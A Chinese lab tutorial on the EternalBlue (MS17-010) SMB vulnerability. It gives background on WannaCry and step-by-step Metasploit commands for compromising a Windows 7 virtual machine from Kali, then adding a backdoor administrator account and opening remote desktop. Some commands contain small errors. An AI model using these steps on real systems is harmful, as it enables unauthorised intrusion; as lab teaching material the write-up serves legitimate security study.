永恒之蓝(ms17-010)漏洞简介及复现

一、永恒之蓝简介与危害

永恒之蓝是指2017年4月14日晚，黑客团体Shadow Brokers（影子经纪人）公布一大批网络攻击工具，其中包含“永恒之蓝”工具，“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日，不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒，英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招，被勒索支付高额赎金才能解密恢复文件。

二、漏洞描述

Windows操作系统的SMBv1协议中存在安全漏洞。攻击者会扫描开放445文件共享端口的Windows机器，向目标机器发送特制报文触发缓冲区溢出，导致在目标机器上远程执行任意代码。

三、ms17-010漏洞复现

1.使用虚拟机打开kali与windows 7查看IP
（1）win 7作为靶机
（2）kali 作为攻击机
2.使用nmap获取目标主机的信息

3.在kali中输入 msfconsole（打印图形化界面，比较慢）
msfconsole -q ：不打印图形界面，可以快速启动

4.进入后输人search ms17-010（搜索漏洞）

5.使用扫描模块：exploit windows/smb/ms17_010_eternalblue
6.使用攻击模块：use exploitwindows/smb/ms17_010_eternalblue
7.查看需要设置的参数：show options
8.添加攻击参数：set+参数名（参数值）
一般修改(设置)ip地址，线程，端口就行

9.run或exploit进行攻击

10.在这里我们已经攻击成功，进入了对方的系统，但是我们看到了一些乱码，我们可以使用命令chcp 65001改变编码格式，解决乱码问题
11. 创建新用户：net user 用户名 密码/add
将用户添加到管理员组：net localgroup administrators 组名 /add
12.kali远程桌面连接win7：rdesktop ip :端口号